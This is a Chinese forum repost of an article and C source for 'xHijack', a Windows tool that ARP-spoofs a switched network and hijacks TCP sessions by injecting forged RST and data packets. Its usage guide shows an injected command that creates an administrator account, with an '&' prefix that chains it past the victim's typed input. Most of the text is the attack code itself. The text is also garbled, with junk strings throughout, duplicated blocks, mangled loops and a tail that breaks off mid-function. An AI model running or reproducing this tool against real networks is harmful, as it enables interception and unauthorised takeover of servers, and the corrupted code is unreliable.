再谈交换环境下的会话劫持(For windows2000)

韩冰

第一步是开启IP Routing的功能，修改注册表
# c9 o! f. V9 d5 }( xHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\IPEnableRouter为0x1，重启系统即可。
; `+ `+ c, H- g: |4 e第二步是ARP欺骗，具体原理我就不说了。
第三步就是开始劫持啦。

" w0 o/ j2 n+ s% G我写了个程序xHijack可以实现第二、三步功能，使用如下:

Usage: xHijack ServerSide ClientSide
& D& |! ?) I& D1 K( Q
下面根据三种不同的情况分别说明如何输入参数：
; M) a% ~% i. L' O3 j1 V4 `1 m<1>服务器、客户端、劫持者处于同一局域网，接在同一交换机上（或交换机级连？）。
假如服务器的IP是192.168.0.2，客户端的IP是192.168.0.3，提供如下参数给xHijack即可
c:\>xHijack 192.168.0.2 192.168.0.3
劫持前数据流程：server <--> client
7 b/ D8 y. [) o3 y( j+ {0 _劫持后数据流程：server <--> hijacker <--> client

8 N: L% i. ]) f" B. l0 n( E' b) |: }<2>服务器、劫持者处于同一局域网，客户端处于别的网络。
假如服务器IP是202.202.202.2，服务器的网关是202.202.202.1，提供如下参数
xHijack 202.202.202.2 202.202.202.1
8 K  c% N6 k' `劫持前数据流程：server <--> gw <--> routes <--> client
劫持后数据流程：server <--> hijacker <--> gw <--> routes <--> client
2 x7 I8 B$ Q' ?$ d' x
<3>客户端、劫持者处于同一局域网，服务器处于别的网络。
& }& J- Q! F5 R3 M) W假如客户端的IP是192.168.0.2，网关是192.168.0.1，提供如下参数
. y9 @" Q1 W8 n9 v; t- D5 L$ ?xHijack 192.168.0.1 192.168.0.2
- q( R: T" k7 x0 i% t劫持前数据流程：client <--> gw <--> routes <--> server
4 H& u/ ?- w' G劫持后数据流程：client <--> hijacker <--> gw <--> routes <--> server

" C! C0 d0 P4 r& S/ f( ]) I输入两个参数后，会提示你选择网卡，然后会提示
l        <-- List all connections
( O  G: e6 m  l* E: l# cr x       <-- Reset the number x connection
3 V( {. i9 ]9 B3 }w x       <-- Watch the number x connection
% E+ }5 U& E( e0 |h x command   <-- Hijack the number x connection to execute command

+ i% e/ d% [, }5 @list、reset、watch命令我就不解释了。
假如现在有如下连接
(1) 202.202.202.202:23 <--> 192.168.0.3:2345
& H# e. W( D9 ]# v6 A我们想要劫持这个连接运行我们的命令，输入
) x+ \# a" y7 t) @7 PxHijack>h 1 "&net user ey4s hijack /add & net localgroup administrators ey4s /add"
为什么命令前面要加&呢？假如客户刚发送一个字符p过去，我们不加&的话，服务器端接受到的就是
pnet user.....了，加了&后就成为p&net user.....，这样就不管前面客户输入了什么，我们的命令
都能够运行了。以上都假设服务器是windows 2000，unix下加什么字符，我不知道，我是unix白痴，呵呵。
, |$ P$ i' W% d7 I4 s/ R$ Y' X
- R% e6 F) Z8 k1 }8 {( _3 f劫持的流程如下：
; K& c# F6 k) v3 A, T<1>伪装成Server给Client发一个rst包
<2>伪装成Client给Server发了一个数据包
% Y- @1 z6 i& w4 d<3>Server回一个ACK包给client
% u1 s, Y" q4 `<4>因为Cleint的连接已经给我们reset掉了，所以client回一个rst包给server
/ q9 d, o2 B: V6 I& T8 G: u
5 z) m- v: x; R这样的话，我们只能发一个伪造的包，但我想已经足够了。
0 P! O/ p" Z9 w# q6 A+ }2 k想要一直劫持那个连接也可以，如下
<1>伪装成Server给Client发一个rst包
) l2 j5 s$ |! m7 J: b" q<2>欺骗Client，告诉它Server的MAC地址AAAAAAAAAAAA
8 K' E& |' X4 z4 A" N# x! a<3>伪装成Client给Server发了一个数据包
<4>Server回一个ACK包给client
<5>Client回一个rst包给Server，但Server收不到，因为Client发到AAAAAAAAAAAA了，呵呵。
9 E3 H; x; O& H/ E& h& U4 Y7 v<6>然后Server发给Client的包都由我们来处理，包括给Server回ACK包等等。

不过这样比较危险，在我们劫持的过程中，Client与Server的通讯始终是断开的。
  n9 d9 b1 {4 m' T
3 }; ^5 k) D& _/ e: n, Z
刚开始看TCP/IP协议，调程序调得头昏脑涨，说明也写的乱七八糟，呵呵，程序代码也可能存在很多问题，
1 [, k0 p- m* g" L# `1 g5 I还请各位多多指点。

0 ~$ [, Y- W9 X  aBTW:我没有空间，编译好的程序没地方放：（
7 @6 j- P; o( Z' c3 P
- p6 _6 ^% r; H4 j
6 `* F! J$ i, @* r' w
参考资料
4 q" V1 p* h# M8 L! Z<>交换环境下的会话劫持http://www.xfocus.net/article_view.php?id=375
1 W+ K4 q/ l2 b<>交换网络中的嗅探和ARP欺骗http://www.xfocus.net/article_view.php?id=377


2 [, `* U4 r* j9 r# e6 s8 q+ N以下是程序代码
----------------------------------------------------------------------
/ {- M: H& d" e8 a: S( P/*-----------------------------------------------------------------------------
File      : xHijack.c
" _7 w2 q! V8 ?" C, uVersion      : 1.0
0 W4 p2 I! Y8 J% j; RCreate at    : 2002/8/12
; E7 e3 }: O) F) CLast modifed at  : 2002/8/19
Author      : eyas
5 v8 X  t% i4 V* J9 B; c" `Email      : ey4s@21cn.com
HomePage    : www.ey4s.org
感谢refdom和shotgun发布的源代码，使我获益非浅。
If you modify the code, or add more functions, please email me a copy.

备注:
- i: `; Z' N( p$ s<>没有考虑IP头、TCP头超过20字节的情况
<>没有考虑数据包分片的情况
! c( D. ]7 @: j* S. G<>没有对截取到的TCP数据进行解码，如TELNET，虽然是明文传输，但是TCP数据里面包含了
9 ~* a, m! ^( q! Z: x5 L显示格式、位置等信息，直接打印出来，显得很凌乱。但如果是IRC、SMTP、POP3等就没问
题了。
# m' F" l* X7 |! j
也许下一版本会修正这些问题，也许不会有下一版本了。

3 _9 m- w$ p- t$ p8 I7 P7 K: Y-----------------------------------------------------------------------------*/
#include
6 _6 ^; p- F* Y) C3 u# h) ?#include
#include
7 }4 K! s% N1 i* T+ Q1 M#include
4 z. Z; T6 l9 m6 Z) O0 E7 t+ F+ h& Q#include
% }) P; f5 Q! j3 F  I8 C#include
. Z1 P  t' |$ i- [) h# }#include

4 I8 [9 c- z) J5 j#pragma comment (lib, "packet")
% [4 g+ h8 m* V+ Q# @( p#pragma comment (lib, "iphlpapi")
#pragma comment (lib, "ws2_32")

#define Max_Num_Adapter 10
#define Max_Num_IPAddr  5
' J* h# b; H: }+ T#define EPT_IP      0x0800      /* type: IP  */
#define ARP_HARDWARE  0x0001      /* Dummy type for 802.3 frames */
+ ~' K" i6 I- N5 q5 g#define EPT_ARP      0x0806      /* type: ARP */

" d* c7 J2 y# c/ Q9 `7 i#define  ACTION_NONE    0
6 }# [* M7 U2 e( o% D6 u#define  ACTION_WATCH  1
+ L8 U0 d8 j5 o( b- X" V#define  ACTION_RESET  2
#define ACTION_HIJACK  3

/*以1字节对齐*/
#pragma pack(1)
typedef struct _ehhdr
{
  unsigned char  DestMAC[6];
  unsigned char  SourceMAC[6];
  unsigned short  EthernetType;
}EHHDR, *PEHHDR;
3 h8 W3 [; ]+ ?4 U7 R$ i9 b( `( p
" R) k& l. F; m  Xtypedef struct _iphdr        //定义IP首部
9 H5 a' W9 E1 o{
  unsigned char h_verlen;      //4位首部长度,4位IP版本号
  unsigned char tos;        //8位服务类型TOS
2 e) @0 Q5 s2 H  unsigned short total_len;    //16位总长度（字节）
  unsigned short ident;      //16位标识
0 v* N5 b7 N) n% U. g  unsigned short frag_and_flags;  //3位标志位
  unsigned char ttl;        //8位生存时间 TTL
  unsigned char proto;      //8位协议 (TCP, UDP 或其他)
  unsigned short checksum;    //16位IP首部校验和
6 h8 w. ^% T' h4 o- v* e  unsigned int sourceIP;      //32位源IP地址
  unsigned int destIP;      //32位目的IP地址
}IPHDR, *PIPHDR;

typedef struct _tcphdr        //定义TCP首部
. w4 {: n, q  R{
  USHORT th_sport;        //16位源端口
: J# X0 x$ Z5 K  USHORT th_dport;        //16位目的端口
  unsigned int th_seq;      //32位序列号
  D0 c9 T: i8 E5 m  unsigned int th_ack;      //32位确认号
  unsigned char th_lenres;    //4位首部长度/6位保留字
  unsigned char th_flag;      //6位标志位
  USHORT th_win;          //16位窗口大小
( R3 P0 j. M/ D9 R5 R; p  USHORT th_sum;          //16位校验和
& b# ^+ [+ I4 @' ~" W5 D  USHORT th_urp;          //16位紧急数据偏移量
' n% L1 n# k6 A" r, U! Z}TCPHDR, *PTCPHDR;

7 a4 ~5 r; e4 j  m# Xtypedef struct _psdhdr        //定义TCP pseudo header
4 _+ R2 s8 a' J  ^: g. a7 T, G{               
( u% C/ t- p" ?" E3 t9 z  unsigned long saddr;
  unsigned long daddr;
  char mbz;
% @* v8 J7 M  c9 ^% \! B2 O  char ptcl;
( q7 Q* }8 T& x( }, h: ]  unsigned short tcpl;
}PSDHDR, *PPSDHDR;

7 M. F7 |) N7 qtypedef struct _arphdr
{
8 L8 J$ Y1 A  R& C  unsigned short  HrdType;//硬件类型
  unsigned short  ProType;//协议类型
  unsigned char  HrdAddrlen;//硬件地址长度
  unsigned char  ProAddrLen;//协议地址长度
6 X# V' f' L  U' Z  unsigned short  op;//operation
  unsigned char  SourceMAC[6];/* sender hardware address */
$ Q% f3 M& M- D: v' Y" i1 v  unsigned long  SourceIP;/* sender protocol address */
2 l/ b* G2 }$ [/ B5 s  unsigned char  DestMAC[6];/* target hardware address */
  unsigned long  DestIP;/* target protocol address */
- q! s( Z2 B+ E& P* F}ARPHDR, *PARPHDR;
# H. t, R! D  q% y/ ~$ @
typedef struct _ArpPacket
{
  EHHDR  ehhdr;
/ v( \7 M  [  g/ X$ W4 b* o  ARPHDR  arphdr;
}ARPPACKET, *PARPPACKET;

typedef struct _tcppacket
7 {! J- h! W4 ?" Q! k) a: S/ q7 q& N{
: |1 r, w; p; B" Q  EHHDR  ehhdr;
  IPHDR  iphdr;
1 H/ R3 V" n+ o8 {% k" l  TCPHDR  tcphdr;
}TCPPACKET, *PTCPPACKET;
7 A, t9 q. L9 E$ O6 a, ], J
typedef struct _conninfo
% v, x4 O1 [' K% k* |" q1 K3 F{
  DWORD  dwServerIP;
  USHORT  uServerPort;
( o% b$ V* q; M% _  DWORD  dwClientIP;
0 P0 C4 K0 \% x5 T+ A  USHORT  uClientPort;
  DWORD  ident;//标识
2 v! h6 K; Z1 J, ?; \& l  BOOL  bActive;
  struct  _conninfo  *Next;
' t5 [4 ~7 T5 Q% ~# D}CONNINFO, *PCONNINFO;
5 i: u; S) G3 r9 \$ v
//定义全局变量

韩冰

unsigned int  g_ServerSideIP,
. U0 i5 r! J$ _2 P3 m1 A: O9 ?* F, D        g_ClientSideIP,
2 b5 O  l0 ^/ v7 d# i$ o0 H# }        g_OwnIP[Max_Num_IPAddr],//本机IP地址列表
+ t/ m# o# i/ c; v% A. x! z        g_TotalIP = 0;//
% j; n: u- |0 k8 m; U' Ounsigned char  g_szOwnMAC[6];//本机MAC地址
# m7 V" c4 U1 k) t* dunsigned char  g_szClientSideMAC[6];
2 a# g7 p$ n6 P# z; Iunsigned char  g_szServerSideMAC[6];
6 Z6 ^: G; V+ T; ~char      g_szTcpFlag[6] = {'F','S','R','P','A','U'};//TCP标志位
4 W; b$ a. v! A2 `LPADAPTER    g_lpAdapter;
# D* K+ Q- e; G/ F( }# Z//1 and 2 is arp spoof thread, 3 is recv packets thread, 4 is interface thread
HANDLE      g_hThread[4];
char      g_szCommand[128];//command to execute after hijack
DWORD      g_dwAction;//action type
  {. H+ p& `) _. o. p6 DDWORD      g_dwCtrlConn;//action 所控制连接的标识
% I# b' N9 G; T, N3 G6 ^DWORD      g_ident;//节点标识，递增
$ {: |% y; e. W5 j2 ?8 n; l+ r  aPCONNINFO    g_pCurrCtrlConn = NULL,//action当前所控制的连接的信息结构指针
        g_pConnHead = NULL,
/ X) J  v4 E8 x) |$ n: H        g_pConnLast = NULL;
' c; ?+ s1 ]3 cchar      g_szSendPacketBuf[1514];
LPPACKET    g_lpSendPacket;
//函数
void      usage(void);
+ x, }6 T4 K7 ]! d+ t9 vvoid      ShowPacketMoreInfo(PTCPPACKET, USHORT, BOOL);
# i7 T6 _2 C4 ~. ^/ _8 tvoid      ListAllConnection();//列出当前所有的连接
void      ResetActionAllFlag();
USHORT      checksum(USHORT *, int);
+ Z& u1 f6 R$ }BOOL      GetMACAddr(DWORD DestIP, char *pMAC);//取得目标IP的MAC地址
BOOL      IsACKPacket(unsigned char);//判断是不是一个纯ack包
LPADAPTER    InitAdapter();//初始化一些参数和全局变量
( }. y. [* ~8 M8 _+ VBOOL      SendRstPacket(unsigned int, unsigned int);//伪装成server给cilent发送rst包
) c8 I+ H3 y/ t+ y* ~8 {; |0 r& cBOOL      SendHiJackPacket(PTCPPACKET);//伪装成client给server发送我们的包
: L' K* X/ ~% g: V4 _DWORD      GetConnNum(char *, DWORD, DWORD *);
" T% P7 r' [* z1 W: K4 N! n: _2 fDWORD      CtrlConnInfoLink(DWORD, USHORT, DWORD, USHORT, BOOL, BOOL);
DWORD  WINAPI  ArpSpoofThread(LPVOID);//进行arp欺骗的函数
6 m. q8 y6 \$ PDWORD  WINAPI  AnalysePacketsThread(LPVOID);//分析处理接收到的包
DWORD  WINAPI  InterfaceThread(LPVOID);//
BOOL  WINAPI  CtrlEvent(DWORD);
4 g+ |( }1 M* v2 U! E' \

+ J$ Z+ s: t9 W9 I4 p
int main(int argc, char **argv)
{
  struct    bpf_stat stat;
7 Y: w# Z2 a' r* R! b$ r  int      i;
( g( |4 `, m  {) v
1 S  s% r, U5 Y5 J! H  p  usage();
  if (argc != 3) return 0;
' ~; N( H: K4 ~  //取得参数
7 U( m& x1 D# }( \5 }  g_ServerSideIP = inet_addr(argv[1]);
  g_ClientSideIP = inet_addr(argv[2]);
  //初始化adapter & 一些全局变量
  g_lpAdapter = InitAdapter();
5 m+ T1 d! I( r3 u& G# x" V  if(!g_lpAdapter) return 0;
: t! E2 H! I0 Y. `7 u4 C9 l  A; o( Z  //get ServerSide MAC & ClientSide MAC
3 e$ p# v' }: M1 G( f  if(!GetMACAddr(g_ServerSideIP, g_szServerSideMAC)) return 0;
  if(!GetMACAddr(g_ClientSideIP, g_szClientSideMAC)) return 0;
  //create arp spoof thread     
  i = 1;
2 z; n# `0 F5 A6 m0 R) M$ I  g_hThread[0] = CreateThread(NULL, 0, ArpSpoofThread, &i, 0, 0);
  Sleep(500);
  i = 2;
. N6 S8 @9 s2 u, W* |& K  g_hThread[1] = CreateThread(NULL, 0, ArpSpoofThread, &i, 0, 0);
7 H3 j+ z6 i5 c0 I* q( P  //create analyse packet thread
5 b$ I. X" Z& ^7 d) k  U  g_hThread[2] = CreateThread(0, 0, AnalysePacketsThread, NULL, 0, 0);
4 J1 A- P* T( ?1 Z9 {  //create interface thread
4 r! E% d! |: d1 d+ Z  g_hThread[3] = CreateThread(0, 0, InterfaceThread, NULL, 0, 0);
  //set console ctrl handle
: s! a- ^& Y  c- s  if(!SetConsoleCtrlHandler(CtrlEvent, TRUE))
) Q: F/ E+ \( P. \4 d% d3 e9 G  {
$ O7 c9 _# ^7 P+ _    printf("SetConsoleCtrlHandler error:%d\n", GetLastError());
3 z: c4 s' R. h& ?    return 0;
  }
  //wait for any thread exit
  WaitForMultipleObjects(4, g_hThread, FALSE, INFINITE);
  //print the capture statistics
2 I7 i" x; o/ P  if(PacketGetStats(g_lpAdapter, &stat) == FALSE)
    printf("Warning: unable to get stats from the kernel!\n");
: r4 r5 y/ S, O2 m  else
. N. K9 ^1 V0 X* s* Q0 o    printf("\n\n%d packets received.\n%d Packets lost\n",stat.bs_recv,stat.bs_drop);
  //free resource   
7 A% @$ U0 C/ G4 i/ L! w  PacketFreePacket(g_lpSendPacket);
  PacketCloseAdapter(g_lpAdapter);
. Q4 H1 n8 Y: f  return 0;
}

/ L7 `1 k3 w- O' ?1 l& i& X; P//
& }, U; k. ]( S0 k( ?7 A! O( t//功能：重置所有于ACTION有关的标志
//

韩冰

unsigned int  g_ServerSideIP,
        g_ClientSideIP,
( U  o( U. A$ o0 }# e+ P        g_OwnIP[Max_Num_IPAddr],//本机IP地址列表
* M* D; D+ N7 n. b        g_TotalIP = 0;//
unsigned char  g_szOwnMAC[6];//本机MAC地址
unsigned char  g_szClientSideMAC[6];
$ X1 F3 v  K4 J! [unsigned char  g_szServerSideMAC[6];
char      g_szTcpFlag[6] = {'F','S','R','P','A','U'};//TCP标志位
LPADAPTER    g_lpAdapter;
" e/ r" y% \- d  ^1 ?: M//1 and 2 is arp spoof thread, 3 is recv packets thread, 4 is interface thread
HANDLE      g_hThread[4];
* P% t2 v. a0 E% q/ H# qchar      g_szCommand[128];//command to execute after hijack
DWORD      g_dwAction;//action type
) y; h, [$ x* W% S' N8 }DWORD      g_dwCtrlConn;//action 所控制连接的标识
2 i1 c; _# y" ]/ N: q( HDWORD      g_ident;//节点标识，递增
8 Y7 ?) K7 W( fPCONNINFO    g_pCurrCtrlConn = NULL,//action当前所控制的连接的信息结构指针
        g_pConnHead = NULL,
        g_pConnLast = NULL;
6 F  b5 e4 m3 j7 h7 |& uchar      g_szSendPacketBuf[1514];
  Z  S4 R* y# }LPPACKET    g_lpSendPacket;
//函数
: e2 v( c2 A4 C" Y, f9 kvoid      usage(void);
- a) Q; U3 A9 a! l8 q) vvoid      ShowPacketMoreInfo(PTCPPACKET, USHORT, BOOL);
; ^7 A$ ?1 A7 x3 Wvoid      ListAllConnection();//列出当前所有的连接
7 O: y# u' u' O: Z5 \0 D6 }' r! [void      ResetActionAllFlag();
USHORT      checksum(USHORT *, int);
BOOL      GetMACAddr(DWORD DestIP, char *pMAC);//取得目标IP的MAC地址
BOOL      IsACKPacket(unsigned char);//判断是不是一个纯ack包
LPADAPTER    InitAdapter();//初始化一些参数和全局变量
8 _4 {& I! I3 |  s# m* qBOOL      SendRstPacket(unsigned int, unsigned int);//伪装成server给cilent发送rst包
BOOL      SendHiJackPacket(PTCPPACKET);//伪装成client给server发送我们的包
DWORD      GetConnNum(char *, DWORD, DWORD *);
DWORD      CtrlConnInfoLink(DWORD, USHORT, DWORD, USHORT, BOOL, BOOL);
DWORD  WINAPI  ArpSpoofThread(LPVOID);//进行arp欺骗的函数
DWORD  WINAPI  AnalysePacketsThread(LPVOID);//分析处理接收到的包
DWORD  WINAPI  InterfaceThread(LPVOID);//
BOOL  WINAPI  CtrlEvent(DWORD);
. |" X! D% f6 R


+ l) A5 a/ C; d  C0 @int main(int argc, char **argv)
{
  struct    bpf_stat stat;
  int      i;
' X5 G2 e6 e* w& v
  usage();
  if (argc != 3) return 0;
5 P# E' \% q  x% u$ ~  //取得参数
8 r" o( J- G8 X* v. G  g_ServerSideIP = inet_addr(argv[1]);
  g_ClientSideIP = inet_addr(argv[2]);
2 j0 N% J9 T, v% `  //初始化adapter & 一些全局变量
8 n# R4 T2 K/ g" y7 j  g_lpAdapter = InitAdapter();
  if(!g_lpAdapter) return 0;
  //get ServerSide MAC & ClientSide MAC
  if(!GetMACAddr(g_ServerSideIP, g_szServerSideMAC)) return 0;
6 A3 `& i$ C2 S& M0 B: P- q/ C  if(!GetMACAddr(g_ClientSideIP, g_szClientSideMAC)) return 0;
! o( Y- d  }8 A3 m2 t* r" B  //create arp spoof thread     
  i = 1;
4 R1 W1 `" i; b( u, l3 B  g_hThread[0] = CreateThread(NULL, 0, ArpSpoofThread, &i, 0, 0);
  Sleep(500);
  i = 2;
' L3 B; g- X5 p  g_hThread[1] = CreateThread(NULL, 0, ArpSpoofThread, &i, 0, 0);
: w" C: x3 d* P6 h  //create analyse packet thread
  g_hThread[2] = CreateThread(0, 0, AnalysePacketsThread, NULL, 0, 0);
' ?$ g8 P- I# s. a  o0 i0 m  //create interface thread
  g_hThread[3] = CreateThread(0, 0, InterfaceThread, NULL, 0, 0);
% ?# _' d0 n9 h5 v2 E7 r. n  //set console ctrl handle
# g8 ^/ w; y, P' s0 E7 `9 r! {$ a  if(!SetConsoleCtrlHandler(CtrlEvent, TRUE))
  {
    printf("SetConsoleCtrlHandler error:%d\n", GetLastError());
    return 0;
% O5 J- V$ f. U9 h4 c1 k  }
  //wait for any thread exit
" b7 @& c- F' m2 C/ O  WaitForMultipleObjects(4, g_hThread, FALSE, INFINITE);
' M8 y: K1 z3 E/ ]8 p4 I  //print the capture statistics
  if(PacketGetStats(g_lpAdapter, &stat) == FALSE)
$ s  k2 Y3 h) u" f$ N    printf("Warning: unable to get stats from the kernel!\n");
. K6 v  o* ?! D  else
    printf("\n\n%d packets received.\n%d Packets lost\n",stat.bs_recv,stat.bs_drop);
  //free resource   
! L% ?$ u0 ~, U. c6 L  PacketFreePacket(g_lpSendPacket);
  PacketCloseAdapter(g_lpAdapter);
  return 0;
7 T( \5 n, G% _1 T2 ^' z# r# I}

% T5 N6 ^/ Q+ f% w; g5 Y//
//功能：重置所有于ACTION有关的标志
//

韩冰

void ResetActionAllFlag()
{
  g_dwCtrlConn = 0;
  g_pCurrCtrlConn = NULL;
  g_dwAction = ACTION_NONE;
}
0 a8 x$ e6 `' b
//
//功能：处理Ctrl+C和Ctrl+Break事件
//
BOOL WINAPI CtrlEvent(DWORD dwCtrlType)
; G3 \* P5 N# }, w% Z; I{
  switch(dwCtrlType)
( T: ?: x7 u- d6 N  a* w  {
    case CTRL_BREAK_EVENT:
      //reset action all flag
      ResetActionAllFlag();
      break;
" g# Q* W" f  E; [* @" d2 k    case CTRL_C_EVENT:
3 \6 V; z7 j4 Q! P& z4 _      //terminate all thread
2 X; H8 o0 D5 v      TerminateThread(g_hThread[0], 0);
1 Z% i4 g/ Y- x- z: T4 l      TerminateThread(g_hThread[1], 0);
      TerminateThread(g_hThread[2], 0);
      TerminateThread(g_hThread[3], 0);
! o3 y: i" M5 W2 G      break;
$ ?( q" ^) q- k  T0 t6 h9 c  P. z    default:
      break;
% |) K: h0 _6 K# d0 B5 x  }
  return TRUE;
}
7 Y; w+ \0 n+ d0 Q( J$ g  ^
% o5 E8 O1 o- x; ^% Y% m9 l$ R" o) G4 @9 m//
, X$ J; h3 {% k/ U" o/ @//功能：处理用户输入
//
DWORD GetConnNum(char *szStr, DWORD dwLen, DWORD *lpCommandPos)
{
/ h+ \  C$ u7 z2 F; N# p5 V. U  DWORD  i;
  char  szBuff[16];

* e; M' D+ |% R7 w  *lpCommandPos = 0;
  for(i=0; i<15, i代码比较乱
//
DWORD WINAPI InterfaceThread(LPVOID lp)
{
  char  szHelp[] =  "l\t\t<-- List all connections\n"
            "r x\t\t<-- Reset the number x connection\n"
            "w x\t\t<-- Watch the number x connection\n"
            "h x command\t<-- Hijack the number x connection to execute command\n"
            "[Note]\n"
- k$ k- H. @- H' F. s/ W9 |9 o            "Ctrl+Break to clear all action\n"
' F) C7 b! T* p, v! e' G            "Ctrl+C to exit\n";
, V/ l3 `% J+ c5 _6 G- Y6 Q  char  szPrompt[] = "\nxHijack>";
, M$ U9 T6 i  j  char  szBuffer[128];
! s! \3 L* S4 N. e& T  DWORD  dwPos;
/ _2 [* R; {" t6 ~3 F# s  PCONNINFO  pTmp;

" T% G4 Z# q+ `+ ?6 @  while(1)
- `5 C  c' f% h/ H! |" Y  {
    gets(szBuffer);//不考虑buffer overflow
    switch(szBuffer[0])
$ F4 P: X$ J6 p$ |' T7 |% Y    {
$ Y: q  |" A& l      case 'l':
      case 'L':
        ListAllConnection();
        break;
      case 'r':
2 }  p2 i) j% }      case 'R':
        if(strlen(szBuffer) >2)
        {
          g_dwCtrlConn = GetConnNum(&szBuffer[2], strlen(szBuffer) - 2, &dwPos);
          g_dwAction = ACTION_RESET;
        }
        else printf("%s", szHelp);
        break;
  N+ }" M0 H8 f' I: n4 D2 W      case 'w':
      case 'W':
        if(strlen(szBuffer) > 2)
9 y5 {' \* S( M2 r) L        {
5 E: y* {9 D. |! L          g_dwCtrlConn = GetConnNum(&szBuffer[2], strlen(szBuffer) - 2, &dwPos);
+ l% M  d5 k# u2 h) n+ B          g_dwAction = ACTION_WATCH;
        }
# P2 O2 G9 }' D% R        else printf("%s", szHelp);
        break;
* z4 D3 \* N. Q      case 'h':
      case 'H'://h 1 xxx
" u8 `1 ]% f& P8 y        if(strlen(szBuffer) > 5)
        {
          g_dwCtrlConn = GetConnNum(&szBuffer[2], strlen(szBuffer) - 2, &dwPos);
6 o) S1 @, Q4 _% x% ]          //如果command第一个字符是'或"
          if( (szBuffer[2+dwPos+1] == '\'') || (szBuffer[2+dwPos+1] == '\"') )
          {
            strncpy(g_szCommand, &szBuffer[2+dwPos+1+1], sizeof(g_szCommand) - 3);
0 a/ @" B8 M/ z- b5 ^            g_szCommand[strlen(g_szCommand) - 1] = 0x0;//去掉最后一个'或"
          }
          else strncpy(g_szCommand, &szBuffer[2+dwPos+1], sizeof(g_szCommand) - 3);
- ]/ X6 ?( m# B. U9 _/ Z          strcat(g_szCommand, "\x0D\x0A");
          g_dwAction = ACTION_HIJACK;
/ Y! a( o& v" v5 O  q/ T        }
        else printf("%s", szHelp);
        break;
      default:
: ]+ I% j1 B/ s, T        printf("%s", szHelp);
        break;
    }//end of switch
$ x0 X( e# a: Q/ C7 a    //find the specify ident's struct point
    if( (g_dwCtrlConn) && (g_dwAction) )
2 q4 {' v+ X/ v    {
      g_pCurrCtrlConn = NULL;
' X2 O% [) N4 s6 v8 p5 h      pTmp = g_pConnHead;
      while(pTmp)
) A9 B) Q( g2 u% W6 g1 f; d      {
6 W" c: D' Y6 `' J* d# u        if((pTmp->ident == g_dwCtrlConn) && (pTmp->bActive) )
0 j) z( |& r6 W: E        {
: ?& ^2 _6 D( a4 V3 ]          g_pCurrCtrlConn = pTmp;
          break;
        }
        pTmp = pTmp->Next;
+ q# ]/ m( f0 v2 ]2 ]  J1 k0 D' B      }
      if(!g_pCurrCtrlConn)
* y8 H; g6 H. ^, z, ~1 o0 B3 C      {
' I- B6 i2 t- u        printf("Can't find the number %d connection.\n", g_dwCtrlConn);
) u: u* d" ^( i& r: q6 h7 q1 l        //reset action all flag
        ResetActionAllFlag();      
      }
    }
    if(!g_dwCtrlConn) ResetActionAllFlag();
& I  |' O/ ]% y0 g; a    //显示当前用户所期望的动作
    printf("\nCurrentAction:");
    switch(g_dwAction)
    {
( |8 {4 n1 y# d      case ACTION_WATCH:
- I( I8 U. j2 @        printf("ACTION_WATCH");
        break;
      case ACTION_RESET:
5 q- s0 ?6 P0 k# z        printf("ACTION_RESET");
) Y7 r+ Q8 e& O" O3 w9 Q( o8 `        break;
      case ACTION_HIJACK:
        printf("ACTION_HIJACK");
        break;
$ x  V. c7 l' G6 x7 f      default:
( h- d1 _7 ]9 z4 b. r3 i( _  |        printf("ACTION_NONE");
        break;
    }
. `, L. Z5 [0 \! g: h    printf("\tCurrentCtrlConn:%d%s", g_dwCtrlConn, szPrompt);
  }//enf of while
  return 0;
}

韩冰

// //功能：列出当前所有连接 " f) n; K" j/ z// + b5 r3 W5 M4 m. t# J- rvoid ListAllConnection() # R9 x4 U& c3 c+ S2 v6 h& [{ 7 J& x8 y& G0 W; `2 k3 t; G PCONNINFO pTmp; SOCKADDR_IN saDest, saSource; 0 [# ^* O3 S) K pTmp = g_pConnHead; while(pTmp) & e5 W8 N9 k5 g/ q5 @ { : c6 b& O2 B. _2 {1 s1 j if(pTmp->bActive) { 2 s- n* Q* w% G+ ?! Z- A' J saSource.sin_addr.s_addr = pTmp->dwServerIP; saDest.sin_addr.s_addr = pTmp->dwClientIP; printf("(%d) %s:%d <--> ", pTmp->ident, inet_ntoa(saSource.sin_addr), ntohs(pTmp->uServerPort)); printf("%s:%d\n", inet_ntoa(saDest.sin_addr), ntohs(pTmp->uClientPort)); 8 M, }( J+ N! P+ { } 2 F G& R- u! L# z9 w' l pTmp = pTmp->Next; } } , u' a$ n1 d$ _/ t+ a$ Q # r' K6 ^8 y" Y3 h9 r- O3 u3 W0 U6 s* m// 6 z8 P1 E: P1 u8 u/ f1 b: M//功能：初始化一些数据，取得指定网卡的MAC地址和所有IP地址 2 y0 x1 S# l: h! q! F) D& v( |1 ^// 7 x( i; C' q/ ZLPADAPTER InitAdapter() { * ]: O# L& k* h6 M8 i" }0 R8 [ LPADAPTER lpAdapter; static char AdapterList[Max_Num_Adapter][1024]; char szSelectAdapterName[512]; 7 l, {2 w% ^; {. O" `# Y+ S5 o8 L WCHAR AdapterName[2048]; 4 N# L& l6 Z- }' E WCHAR *temp,*temp1; ULONG AdapterLength = 1024; int iAdapterNum = 0; 7 g% \) B, g- `" f$ F' U int iRetCode, i; int iAdapter = 0; ULONG ulLen = 0; 8 {- f8 Q! ~: _ DWORD dwRet; ! a- h9 ?8 z% s s/ T1 R PIP_ADAPTER_INFO pAdapterInfo = NULL, pTmp; 4 o/ p. C8 `4 f' b8 |% Z3 O( y PIP_ADDR_STRING pIPAddr; //Get The list of Adapter ) u/ ]1 H) h* M if(PacketGetAdapterNames((char*)AdapterName, &AdapterLength) == FALSE) $ j$ C" M2 ~% z# V" R4 n { printf("Unable to retrieve the list of the adapters!\n"); return 0; " G0 ^1 S! @1 H+ p7 t } 0 j6 x9 G, q6 |* u! ^ temp = temp1 = AdapterName; i = 0; & f# A! d+ l% o) I while ((*temp != '\0')||(*(temp-1) != '\0')) { if (*temp == '\0') { ( V1 r) o$ O9 V# l ~. { memcpy(AdapterList,temp1,(temp-temp1)*2); printf("%d - %S\n", i+1, AdapterList); + q" ~# U' c" r# _2 F* Q temp1=temp+1; i++; } temp++; } 2 e8 ?; X$ {+ s0 j: q6 s3 V) [ //choose adapter while((iAdapter <= 0) || (iAdapter > i)) 4 b* I7 Y' |; C0 h- ^ { printf("\nPlease choose your Adapter:"); s2 r4 r3 L2 x5 w+ J scanf("%1d", &iAdapter); } printf("\n"); //---------------------------------------------// / w5 m! F2 A; x. k //这里调用iphlpapi来取得本地ip_addr和mac_addr x# O& I2 ~* B. Y! G; H. J" l sprintf(szSelectAdapterName, "%S", AdapterList[iAdapter -1], 